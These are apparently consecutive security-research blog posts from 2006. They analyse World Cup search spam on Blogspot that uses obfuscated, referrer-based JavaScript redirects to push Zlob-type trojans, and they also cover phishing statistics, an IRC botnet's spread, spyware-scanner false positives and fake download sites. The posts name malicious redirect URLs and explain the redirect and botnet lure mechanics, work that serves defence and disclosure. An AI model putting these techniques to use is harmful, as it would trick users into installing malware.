In this example our research term used was for FIFA, so it would seem unreasonable to be offered an adult downloader. This is deceptive, and many users may find it offensive, especially since it is reasonable to expect young football fans would be searching for similar terms and will be guided by the domain name, title and description.

From a legal context this is significant: US CODE: Title 18,2252B. Misleading domain names on the Internet, from law.cornell.edu.

In a final example, the redirection goes to a website which features pornographic galleries offering a program that is cited as a variant of Zlob.Media-Codec. It may go under different names. A EULA is presented if the user wants to access the deceptively advertised pornography. We have not placed a screenshot here because the images are simply too offensive for our blog standards, but we have retained screen capture documentation and video of the site.

The different variants of these programs have to be downloaded in order to play any of the movies on the web-site.

Note this particular search query was conducted from one of our labs in India, so other users and countries will likely get different results. In addition search results change frequently. For purposes of documentation, we have included packet logs from query to destination as well as install of software.

Query Sample 1: Term FIFA+World+Cup+2006 .txt file

Query Sample 2: Term FIFA+World+Cup+2006 .txt file

We Just Wanted the World Cup

In the sample query illustrated by the packet logs above our researcher, searching for ?FIFA World Cup 2006?, finds a tainted Blogspot site and clicks-thru. The log documents the various redirects which end with the researcher arriving on a pornographic website where he was offered, and accepted, programs with well documented problematic behavior.

The initial MSN results showed 3 out of 10 results from Blogspot which display the obfuscated JavaScript and re-direction system. Users rely on search engines to deliver them high quality and relevant results. Since the domain names contain football (soccer to U.S. readers) related terms, titles and descriptions it is reasonable the user will feel confident to click-thru.

In a system such as this any number of attacks could be launched, and depending on the degree of sophistication of the attack or skill in social engineering- the results could be quite harmful. The screenshot below shows the tainted Blogspot URLs at MSN in the top ten results.

Click To Enlarge Image

Past History of Problems

It should be noted that while unable to document any exploit behavior with the software page of the pornographic content, it has a well documented history of problematic behavior from numerous third party sources. It is usually classified as a "trojan". Reference: Sunbelt on Zlob.Media-Codec. and on Super AdBlocker on xpassman-v3 for example.

EULA Red Flags

In this particular case EULAs were presented with the software product(s) needed to access the content deceptively advertised by the unknown party. EULA analysis shows additional security software will be added, updates can be made, and home page will be change among other items.

See one EULA Analysis Sample

By accepting it the user grants the software rights to install additional components on the machine. These components or updates may not have cleared appropriate security hygiene processes. In addition no warranty on performance of the software is given.

Also notable among the EULAs displayed, using our automated readability analysis demonstrates above 12-Grade Reading Level skills needed to understand the document based on various readability batteries.

Flesch Grade: Beyond Twelfth Grade reading level
Automated Readability Index: Beyond Twelfth Grade reading level
Coleman-Liau Index:Beyond Twelfth Grade reading level
Gunning-Fog Index: Beyond Twelfth Grade reading level

Technical Background: How Did Blogspot Do This?

The attack is quite subtle. Put simply it uses obfuscated or "garbled" JavaScript.

Inspecting the inside of the source code of the blog entry, we noted a JavaScript calling a function decode().. We noted there was no simple redirection code found from the page source code at first glance. We also noted only the random numbers stored as a string. Function name itself decode, which was the hint to decode the whole function. Let us take a look at the original source code:

Now let us examine the screenshot of the "decoded" code:

Explanation of Code:
The code says if the blog is referred by any of the following major search engines:

Google
MSN
Yahoo
AOL
Ask
Altavista

Then it will open the URL http://www.toptravel10.com/search.php?aid=<*****>&q=World+Cup, which calls into action the redirection system. Therefore, the writer of this code is actively looking to intercept search traffic and move it somewhere else and the code writer is doing this with obvious intent.

However, if the blogspot address is only pasted or typed into the address bar of the IE browser it will redirect to MSN search result with the keyword "World Cup 2006". As we know from the above search result screen capture 3 out of the first 10 MSN natural search results could most likely be the same kind of tainted Blogspot entries. Clicking any of the entries will again redirect to the same system. This puts the user into a dangerous cycle. We qualify "most likely" because top ten entries can and do change dynamically beyond control of users.

Controlling the Deceit

In this case there is no need to change the source code of the page because the operator of toptravel10 domain has set-up a complex server-side, auto-rotation system of unknown make-up. The tainted Blogspot URLs used the URL http://www.toptravel10.com/search.php?aid=56340&q=World+Cup as a mediator. The Blogspot URLs will to open this page when called. At this point the toptravel10 domain's system decides where the user is redirected. The mediator remains constant and links to different URLs over a given period of time. In this entry the researcher was referred to a Russian Web-site, second ICOONet(Adult DVD Downloader), and now the mediator links to VideoGalleries which in turn offers adult oriented software.

It is also notable the ownership information for the toptravel10.com domain is cloaked through a proxy registration service.

Why Use Blogspot?

Blogspot has been the target for similar attacks in the past. Researcher Ben Edelman?s concern about blogspot will help us understand why this case is important. From his article:

?...Numerous blogs hosted at Google's Blogspot service contain JavaScript that tries to trick users into installing unneeded software..."

In this instance the obfuscated JavaScript not only impacts the quality of search engine results it also acts as a more complex line of redirects to distance the designer from the scene.

Why MSN Search?

As researchers, we might ask: "Why would someone target the MSN search system?"

The logical reasons would probably be most of the Windows based O/S use default redirection to MSN search and/or the orchestrator had some mastery at gaming the Microsoft ranking algorithm.

Examples of tainted URLs are:

http://worldcup2006z.blogspot.com
http://footballwordcup2006.blogspot.com
http://fifaworldcup2006-.blogspot.com
http://-fifaworldcup2006.blogspot.com

(Note: After contacting Google last week- these are now offline!)

.Are There More?

Yes. One such instance was found for the keyword "AIRLINE TICKETS".

These blog URLs may also be redirected to the same pornographic galleries, again depending on the system of rotation.

List of the following blog URLs for the keyword "AIRLINE TICKETS".

http://airlineticketsz.blogspot.com
http://cheapairlineticketsz.blogspot.com

Conclusion and Final Notes:

A solution was already offered by Ben Edelman:

"...What should Google do? Google already disallows JavaScript within Blogspot.com posts. Apparently Google considers embedded JavaScript too risky -- too likely to trick, deceive, or otherwise take advantage of users. But Google oddly allows JavaScript to be added to Blogspot headers and navigation bars. This decision should be reversed..."

In terms of football (soccer) this is the equivalent of a "Yellow Card".

We must add the following caution and warning on the tactical approach.

In this particular case the unknown party used some technological sophistication coupled with knowledge of world events, search engine algorithms and planning. However, the party used poor targeting.

Let us explore a "what if" scenario...

What if the same system, using football (soccer) keywords were used to trick a user to open a page that asked them to view 'World Cup Bloopers' or 'World Cup Highlights' or lured users with a fake video over a 'disputed call' or 'insider interview' cobbled together from pirated video footage? The user, now contextually targeted would probably click and any number of hostile scenarios could be played out. The attack would only limited by the creativity and motivation of the operator.

To use our football analogy again- this is a "Red Card".

LATE ADDITION: We have contacted Google about our concerns pointing out the problem around the World Cup spam and they reacted rapidly. Initial research seems to show they scoured Blogspot and removed the tainted URLs so World Cup fans wouldn't fall into this trap during the championship weekend. However, the root of the problem still remains. What to do about the JavaScript? Ultimately that is a problem Google will have to solve.

The problem has been pointed out before- history should be the teacher.

Blog Summary Write-Up: Wayne Porter, Sr. Dir. Greynets Research
Technical Research: Peter Jayaraj, FSL Threat Researcher

Phishing is a form of criminal activity using social engineering or trickster techniques to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an apparently official electronic communication, such as an email or an instant message. The term phishing arises from the use of increasingly sophisticated lures to "fish" for users' financial information and passwords. Some phishing has become so complicated that it no longer needs to steal information from the web, IM or E-mail, but lure users to use phone connections and capture them using phone techniques. (You call a number, they ask you to enter in your account number and PIN and viola- they capture the "tones" made by your telephone keypad input and your account is wide open to the scammer.)

We talked a while ago about the global phishing termination operation launched by CastleCops and Sunbelt Software. The volunteer PIRT Squad is comprised of folks who report phish, investigate phish, and actively work on phish takedown and termination (original concept by Robin Laudanski). PIRT is funded by CastleCops.

Our own Microsoft Security MVP, Chris Boyd, has been participating on the PIRT Squad over at CastleCops and some of the first results are in. CastleCops' operators, Robin and Paul Laundanski, have compiled the list of the top phished brands in May. Here the all-volunteer group of phishing terminators has been having a real impact on phishing. Our own research team follows-up on many of these phish sites and note that many are offline quickly! That is good news...but the battle is far from over. (Other "things" may lurk on the end of these phish attempts, but that is for another entry.)

So without further ado the top brands fished in May:
Pay special attention to how "pure Internet play" brands like PayPal and eBay are the most common targets.

May 2006 confirmed phish (brand plus total count for May):

PayPal - 520
eBay - 309
Bank of America - 37
Barclays - 36
Wells Fargo - 36
Chase - 33
WAMU - 28
HSBC - 20
MasterCard - 18
e-gold - 17
Nationwide - 17
Citi - 16
BancorpSouth - 14
Postbank.de - 12
Halifax - 11
NetBank - 11
Laredo Nat'l Bank - 10
Nat'l Australia Bank - 10
Western Union - 10
National Credit Union - 9

With this early report in mind we have to take into account that Google is now throwing their hat into the e-commerce ring with a service called "Google Checkout". The business implications of this move are very, very complicated and beyond the scope of this entry- although they are important to security researchers too. However, in terms of pure security research the proverbial writing is on the wall...Google and e-commerce will only attract scammers like bears to honey. How successful they will be will depend much on how Google implements the process, their anti-fraud features, and how educated people are on phishing in general.

I admit, especially in my talks and speeches with youngsters, I am quite dismayed at the lack of awareness on Internet safety. That is one area I, and our team, have been pondering.

One of the best forms of defense is very simply- "street smarts". For example, we teach children not to go into dark alleys late at night, actually most parents wouldn't let their children out in a city at night! Yet our digital highways can be dangerous too- often the mediums are treated differently. I plan more on this in the future.

For now, us get back to Google Checkout.

Some of the features of Google Checkout include:

1) Google will store your complete shopping history. This is convenient of course, but remember if you lose access to that account- that history goes with you. This is no different than losing access via a hack to any e-mail account.

2) Google won't share your full credit card number, even with the merchants you buy from. This makes sense, since Google is doing the transaction on behalf of the merchant.

3) Google won't share your email address with merchants if you don't want them to. This is nice- you don't have to worry about getting lots of promotions via e-mail if you don't want.

4) Google will not spam you. Google pledges they will not spam you- great. They never have and I believe that is not in their plans.

5) You can store as many credit cards in Google Checkout as you want! That is where it starts to get a little bit risky.

Now, again, I am not being anti-Google, I am only being a realist. You have a pure play Internet brand, new to offering payment transaction processing to the public at large, prepared to do business en masse. If we look at recent history, like the PIRT report, it only stands to reason that Google, other privacy concerns aside, will experience their fair share of phishing attempts.

For now- use "street smarts". Be wary and be careful.

NOTE: If you are technically adept at handling phishing attempts and want to help by joining the PIRT Squad you can join the team here, if you simply want to report a phishing attempt you can do so by clicking here.

Hot on the heels of the Botnet caught bundling Zango a few days ago, here's an interesting one I found while lurking in the outermost regions of IRC yesterday...

First off, check out this IRC server. It's fair to say it has a large userbase (at least 16,000 channels!):

...and with that many users, it's a prime target for Botnet pimping. So with that in mind, let's pick up that Pimp Goblet and get things moving!

Assume...just assume...that IRC is, in fact, full of spammers, viruses, Trojans, haxx0rs and Malware. Then...assume that lots of infected users fire spam messages at you to try and infect you with more garbage, making you a part of that particular Botnet.

Then...assume I was fired a Spam message myself, and decided to have a play with the files....

...and sure enough, that's what happened! At this point, I'd usually show you a screenshot of the infection taking hold of the PC, but the thing about "straight" Botnet installers (ie: minus Adware) is that they aren't much use if they put a big, flashing "Botnet Alert!!!!112" message in the middle of your screen. But what I can show you, is a walkthrough of what this particular nasty actually does.

Suffice to say, this install takes place in two parts, and is run via two different Botnets - the Spam installers come from one source, and the Scanner installers come from another. This is merely a safety precaution - if you lose all your Spam-bots due to being shut down, you still have your "Scanner Bots" (which hunt for exploitable machines), and vice versa. No point rebuilding an Empire from scratch, right?

Now let's examine the state of the Server itself - the view is not pretty. The Admins of the IRC server clearly know about the Bot problems - because I've never seen so many Bot kickers, drone watchers and channels full of infected users being dumped out of channels in my life:

As you can see, my IP has been banned from that channel due to the fact it was used when I tested this infection previously - hence, I'm kicked out by a Channel Operator. In addition, I'm not even allowed to enter the other channel (blanked out) - such is the hatred here for Bots. Well, it's understandable.

At this point, I enter one of the (semi-random) channels I know this Bot tries to slip you into from my clean PC...and I wait for my infected test-box to show up. See, this thing works like this: user gets infected, infected PC enters and exits a number of IRC channels and has a particular phrase set as the "away" message. At this point, the away message is Spammed to lots of different users, or is viewable when they look up the infected user's contact info. While I'm waiting for my infected machine to show up, I'm bombarded with what looks like different Bot-spam from anything up to 12 different users within the first 10 seconds of entering the channel. Eventually, my infected PC turns up, and I know for sure that this Botnet is up and running correctly. Of course, all the infected PCs are called things like HOTGURL4YOU, to encourage foolish men to start messaging the Bot like crazy. Which they do....and they then see the away message:

Ooh, yes please!! Want to make a guess how many people will fall for this simple bit of social engineering? Sure enough, anyone foolish enough to click the link and execute the - er - executable...will find themselves upgraded to a higher realm of Botnets!

The "higher realm" here means a Botnet that scans networks for specific vulnerabilities to spread itself still further. I know what you're thinking at this point - the story wouldn't be complete without a screenshot of the master infection channel, right? Well, have no fear, because the Ghostman has already predicted your need to see a payoff shot and here it is:

Nice!

As a sideline, I should add that I don't just find Botnets and take a bunch of pretty pictures, before leaving them to go look for new ones - appropriate steps are taken to get them shut down where possible. I've since found out this one is also being investigated by another group, and I'll be forwarding the information I've collected here to see if it can be put to good use.

In the meantime, if you insist on navigating the dangrous currents of IRC, think twice before checking out SUPAHOTTIEGURL's latest batch of home-grown pictures, or you may find yourself appearing in my next collection of screenshots!

As i blogged earlier in the Entry
In Clean VM, SpyOnThis detected 13 different threats which are all FPs. Most of them were cookies.

Let us dig onto each key flagged as spywares by SpyOnThis and see why are they False Positives?

Object: ClearSearch
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\
TRUSTEDPUBLISHER\CTLS
RiskLevel: 4

ClearSearch object found!!!
Object: ClearSearch
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\
TRUSTEDPUBLISHER\CRLS
RiskLevel: 4

Claria object found!!!
Object: Claria
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_USERS:.default\software\microsoft\systemcertificates\trustedpublisher\crls
RiskLevel: 3

Look at the Original keys are in Registry which is flagged as Spyware,

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CRLs]

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CTLs]

Windows Registry Editor Version 5.00
[HKEY_USERS\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher\CRLs]

Note: There are no values associated with the keys when it detected as Spyware.

In order to make a full analysis we need to know some basic things here:

CA - Certification Authority
An entity entrusted to issue certificates that assert that the recipient individual, computer,
or organization requesting the certificate fulfills the conditions of an established policy.

CRL - Certificate Revocation List
A document maintained and published by a certification authority (CA) that lists certificates
issued by the CA that are no longer valid.

CTL - Certificate Trust list
A predefined list of items that have been signed by a trusted entity. A CTL can be anything,
such as a list of hashes of certificates, or a list of file names. All the items in the list are
authenticated (approved) by the signing entity.

The keys which i mentioned are default keys for Windows operating system to handle
trusted publisher certificates when IE makes secure connection (SSL). SSL creates a secure
connection between a client and a server, over which any amount of data can be sent securely.

CA releases CRLs so often to make sure the user or enterprise knows about the no longer valid certificates.
This registry key modified when we import the CRLs from CA.

None of the above keys are related to either Claria or ClearSearch.
Thus classifying these keys as spyware is erroneous.

Let us check other keys also in detail.

While Googling for downloading Hijackthis, i spotted a link from Google's Adsense program. Check out the following screenshot:

In above screenshot clicking the link ?HijackThis Free download? opens a site http://hijack-thisnet/. Naturally curiosity compelled me to dig deeper into this site and also I wanted to know what Merijn, the original creator of HJT had to about this site? It appears it struck his radar a long time ago and was not pleased the name of his product was being used to push other commercial products.

He states from http://www.merijn.org/

" April 22, 2005:
Just a short note on the domain HIJACK-THIS.NET: this is not mine! It has been registered by an affiliate of XoftSpy (who are also on the Rogue Antispyware List on SpywareWarrior.com) and they are luring people into downloading their software believing it is HijackThis. Also, they have registered a few AdWords at Google leading to the same result. We'll see where this goes. In the meantime, if you want to download any of my programs, the official domain is and always will be www.merijn.org."

UPDATE: April 29, 2005:
I just received word from Paretologic (the ownsers XoftSpy) that the affiliate responsible for the page has been terminated and the site will be taken down. That's one down, one to go. :) "

Let's dig into this mystery...

This one has crept across the security pros and analysis can now be found here and here.

For those not in the know, Yapbrowser is a browser "search tool" - unfortunately, none of the paid for links work (returning a blank page) and anything entered into the browser redirects to...illegal pornography. What makes this even more interesting is that you need to install Zango (from 180 Solutions) to run the application.

The response, or perhaps lack of one, from 180 should be interesting, to say the least...I wonder how it will differ from their interview Wayne Porter did with them a year ago.

They said...

First, 180solutions cares a tremendous amount about what users think about our software from how it is distributed to how it works on a user?s machine. As our company has grown, our company has and will continue to invest heavily in user-focused initiatives. Going forward, through the use of additional staff and innovative technology, we will dramatically increase control over how our partners operate. We understand and accept the responsibility to monitor and police our partners.

Historically, 180solutions has not installed software; we relied on a network of partners to distribute our applications. Over the last year, 180solutions has placed greater emphasis on managing distribution partners as well as moving to maintain more control over how our software is installed on users? machines. In response to public and our own concerns, we careful monitor our channels for conduct we find inappropriate. 180solutions has a stringent distributor code of conduct in place and frequently audits distribution partners.

Reference:

Porter's Preface to 180 Solutions Response & Some Software Philosophy.

Official Response from 180solutions to Porter's Questions